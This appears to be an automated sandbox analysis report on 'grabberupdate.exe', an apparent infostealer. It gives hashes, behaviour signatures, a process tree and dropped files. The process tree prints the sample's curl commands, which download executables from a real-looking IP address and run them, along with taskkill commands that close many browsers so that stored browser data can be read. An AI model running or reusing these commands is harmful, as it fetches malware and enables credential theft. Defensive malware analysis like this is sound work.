Analysis
-
max time kernel
213s -
max time network
282s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
22-05-2024 21:27
Static task
static1
Behavioral task
behavioral1
Sample
grabberupdate.exe
Resource
win10v2004-20240226-en
General
-
Target
grabberupdate.exe
-
Size
87KB
-
MD5
ab378d6539627c52dbfc272c83eb420c
-
SHA1
039060f0fdefbe0a62147a7bbad9b1a526a78d61
-
SHA256
2a0ac2b38c51d764422f55d55a0bca58be786c10b0b1386c5dce3055894c0ef2
-
SHA512
afe3be5f89ad67e2c4440d44c6ed890853eecb6cf34faed20d61ae49f30fa30a5cc390393b3ef4609a34a2121b6831cacf00ee6aa62c268e0b9fce0223bb0222
-
SSDEEP
1536:L7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIfNxFOy:Hq6+ouCpk2mpcWJ0r+QNTBfNZ
Malware Config
Signatures
-
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
grabber.exeram.exepid process 3748 grabber.exe 2800 ram.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 15 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1572 taskkill.exe 3576 taskkill.exe 4140 taskkill.exe 4216 taskkill.exe 3960 taskkill.exe 3188 taskkill.exe 2960 taskkill.exe 3380 taskkill.exe 564 taskkill.exe 4560 taskkill.exe 4416 taskkill.exe 2968 taskkill.exe 5016 taskkill.exe 4716 taskkill.exe 568 taskkill.exe -
Modifies registry class 1 IoCs
Processes:
MiniSearchHost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\MuiCache MiniSearchHost.exe -
Suspicious use of AdjustPrivilegeToken 15 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 2968 taskkill.exe Token: SeDebugPrivilege 1572 taskkill.exe Token: SeDebugPrivilege 3576 taskkill.exe Token: SeDebugPrivilege 5016 taskkill.exe Token: SeDebugPrivilege 2960 taskkill.exe Token: SeDebugPrivilege 4716 taskkill.exe Token: SeDebugPrivilege 568 taskkill.exe Token: SeDebugPrivilege 4216 taskkill.exe Token: SeDebugPrivilege 3380 taskkill.exe Token: SeDebugPrivilege 564 taskkill.exe Token: SeDebugPrivilege 3960 taskkill.exe Token: SeDebugPrivilege 4560 taskkill.exe Token: SeDebugPrivilege 3188 taskkill.exe Token: SeDebugPrivilege 4416 taskkill.exe Token: SeDebugPrivilege 4140 taskkill.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
MiniSearchHost.exepid process 4572 MiniSearchHost.exe -
Suspicious use of WriteProcessMemory 46 IoCs
Processes:
grabberupdate.execmd.exegrabber.execmd.exeram.exedescription pid process target process PID 1360 wrote to memory of 760 1360 grabberupdate.exe cmd.exe PID 1360 wrote to memory of 760 1360 grabberupdate.exe cmd.exe PID 760 wrote to memory of 3644 760 cmd.exe curl.exe PID 760 wrote to memory of 3644 760 cmd.exe curl.exe PID 760 wrote to memory of 2536 760 cmd.exe curl.exe PID 760 wrote to memory of 2536 760 cmd.exe curl.exe PID 760 wrote to memory of 3748 760 cmd.exe grabber.exe PID 760 wrote to memory of 3748 760 cmd.exe grabber.exe PID 3748 wrote to memory of 4604 3748 grabber.exe cmd.exe PID 3748 wrote to memory of 4604 3748 grabber.exe cmd.exe PID 4604 wrote to memory of 1488 4604 cmd.exe curl.exe PID 4604 wrote to memory of 1488 4604 cmd.exe curl.exe PID 4604 wrote to memory of 1840 4604 cmd.exe curl.exe PID 4604 wrote to memory of 1840 4604 cmd.exe curl.exe PID 4604 wrote to memory of 2800 4604 cmd.exe ram.exe PID 4604 wrote to memory of 2800 4604 cmd.exe ram.exe PID 2800 wrote to memory of 2968 2800 ram.exe taskkill.exe PID 2800 wrote to memory of 2968 2800 ram.exe taskkill.exe PID 2800 wrote to memory of 1572 2800 ram.exe taskkill.exe PID 2800 wrote to memory of 1572 2800 ram.exe taskkill.exe PID 2800 wrote to memory of 3576 2800 ram.exe taskkill.exe PID 2800 wrote to memory of 3576 2800 ram.exe taskkill.exe PID 2800 wrote to memory of 5016 2800 ram.exe taskkill.exe PID 2800 wrote to memory of 5016 2800 ram.exe taskkill.exe PID 2800 wrote to memory of 2960 2800 ram.exe taskkill.exe PID 2800 wrote to memory of 2960 2800 ram.exe taskkill.exe PID 2800 wrote to memory of 4716 2800 ram.exe taskkill.exe PID 2800 wrote to memory of 4716 2800 ram.exe taskkill.exe PID 2800 wrote to memory of 568 2800 ram.exe taskkill.exe PID 2800 wrote to memory of 568 2800 ram.exe taskkill.exe PID 2800 wrote to memory of 4216 2800 ram.exe taskkill.exe PID 2800 wrote to memory of 4216 2800 ram.exe taskkill.exe PID 2800 wrote to memory of 3380 2800 ram.exe taskkill.exe PID 2800 wrote to memory of 3380 2800 ram.exe taskkill.exe PID 2800 wrote to memory of 564 2800 ram.exe taskkill.exe PID 2800 wrote to memory of 564 2800 ram.exe taskkill.exe PID 2800 wrote to memory of 3960 2800 ram.exe taskkill.exe PID 2800 wrote to memory of 3960 2800 ram.exe taskkill.exe PID 2800 wrote to memory of 4560 2800 ram.exe taskkill.exe PID 2800 wrote to memory of 4560 2800 ram.exe taskkill.exe PID 2800 wrote to memory of 3188 2800 ram.exe taskkill.exe PID 2800 wrote to memory of 3188 2800 ram.exe taskkill.exe PID 2800 wrote to memory of 4416 2800 ram.exe taskkill.exe PID 2800 wrote to memory of 4416 2800 ram.exe taskkill.exe PID 2800 wrote to memory of 4140 2800 ram.exe taskkill.exe PID 2800 wrote to memory of 4140 2800 ram.exe taskkill.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\grabberupdate.exe"C:\Users\Admin\AppData\Local\Temp\grabberupdate.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\62F0.tmp\62F1.tmp\62F2.bat C:\Users\Admin\AppData\Local\Temp\grabberupdate.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\curl.execurl -s -o grabber.exe "http://188.212.100.57:54391/download/grabber.exe"3⤵
-
C:\Windows\system32\curl.execurl -s -o wlms.exe "http://188.212.100.57:54391/download/wlms.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\grabber.exegrabber.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\79F3.tmp\79F4.tmp\79F5.bat C:\Users\Admin\AppData\Local\Temp\grabber.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\curl.execurl -s -o ram.exe http://188.212.100.57:54391/download/shell.exe5⤵
-
C:\Windows\system32\curl.execurl -s -o rm.exe http://188.212.100.57:54391/download/winlogon.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\ram.exeram.exe5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /F /IM chrome.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /F /IM firefox.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /F /IM brave.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /F /IM opera.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /F /IM kometa.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /F /IM orbitum.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /F /IM centbrowser.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /F /IM 7star.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /F /IM sputnik.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /F /IM vivaldi.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /F /IM epicprivacybrowser.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /F /IM msedge.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /F /IM uran.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /F /IM yandex.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /F /IM iridium.exe /T6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\62F0.tmp\62F1.tmp\62F2.batFilesize
202B
MD5040dc40ccd7346ace502b30584d4d5a0
SHA1886b8f5f079db8f5569235aa6dff74c1cf89942d
SHA256f209745a8497c9b93a16dda0bf627dc88662184b00658013fec202e129f64450
SHA5120319239eaebf27ff0f6c4be1b9f737da31d39faccbf47f6d0a0506d2771515928b38981d75365a0307defd530ff68b4de37d0af89519d052037782a741c7dc02
-
C:\Users\Admin\AppData\Local\Temp\79F3.tmp\79F4.tmp\79F5.batFilesize
230B
MD5abdb6860d790577e02cca5005866bbe8
SHA16c87a9e8b0b29ffe358c079a54f06dd9ef5cfb37
SHA256ee13e97e15c3a2f432a7bfd3af278aa38ff88baa7652ea0bfb2e5d9bf5adb8f0
SHA5121bbcf1d4540019aa392234e91e7629fd9f61240b8d7003df3404536810e639f7019a60bb74c2a08be5f855fd96923d0f8e0cdf7fa3a3d25e1e5829487a959fce
-
C:\Users\Admin\AppData\Local\Temp\cards.jsonFilesize
4B
MD537a6259cc0c1dae299a7866489dff0bd
SHA12be88ca4242c76e8253ac62474851065032d6833
SHA25674234e98afe7498fb5daf1f36ac2d78acc339464f950703b8c019892f982b90b
SHA51204f8ff2682604862e405bf88de102ed7710ac45c1205957625e4ee3e5f5a2241e453614acc451345b91bafc88f38804019c7492444595674e94e8cf4be53817f
-
C:\Users\Admin\AppData\Local\Temp\grabber.exeFilesize
120KB
MD54e1e436848d533c9a00b762ac148786d
SHA142962a264fbdbc96eb8267052298be9143ecd8bf
SHA256efcd31afd704c03d8a487a06c795bba7ea0a1cde0866d8fcfd40f4c3ce197bbd
SHA51259d16efac5f0ea7c62d18ef30032eba907b8d6c097463a8244f3d709c85b90ec12387c94a4d8a35dfb59d0cbd2dc02d0b39a1f6bd12c5ccd050d552070fdf30d
-
C:\Users\Admin\AppData\Local\Temp\ram.exeFilesize
7.6MB
MD52c93399e0b0fc11cd03a56fc844a4816
SHA1d8a6db37b1ac3cc819b04b0f4aac7fe721f88f00
SHA256081da8d5b9e21e11ae3aeafd4ac54ba2e7a45a05abb08139bc1aa0213f1ef155
SHA512dea99c0a22077389f6f6662e644e47ecb55ac010881b135ada2e07ac7a5ba1d42670d52c6cd88804aa3a16783f1e1f39b23fe3f7de6030ede831a27fee30f4a8
-
memory/2800-20-0x00007FF7746C0000-0x00007FF774EF3000-memory.dmpFilesize
8.2MB